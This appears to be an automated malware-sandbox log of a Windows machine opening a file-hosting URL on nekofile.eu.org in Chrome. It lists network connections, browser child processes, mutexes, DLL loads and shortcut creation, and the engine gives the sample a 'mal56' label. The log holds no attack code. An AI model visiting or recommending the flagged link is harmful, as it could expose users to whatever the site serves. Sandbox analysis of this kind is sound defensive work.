Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 191.233.176.51:443 -> 192.168.2.16:49897 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49898 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.16:49931 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.204.88.44:443 -> 192.168.2.16:49935 version: TLS 1.2
Source: classification engineClassification label: mal56.win@60/188@24/206
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\SnippingTool.exeMutant created: \Sessions\1\BaseNamedObjects\Microsoft-Windows-SnippingTool-InitializingMutex
Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\ca6c3320-8cee-47ed-9ed9-5d3a19ab721d.tmp
Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://nekofile.eu.org/f8e2cb54931bf39d6c12eo5nc
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1960,i,16190519597135858479,14534161507011086584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1960,i,16190519597135858479,14534161507011086584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6652 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6652 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: unknownProcess created: C:\Windows\System32\SnippingTool.exe "C:\Windows\system32\SnippingTool.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6924 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6924 --field-trial-handle=1996,i,13940187132944153897,17330075914477945128,262144 /prefetch:8
Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ieframe.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: version.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: secur32.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: mlang.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wininet.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: ninput.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: msdrm.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: wisp.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: atlthunk.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\SnippingTool.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
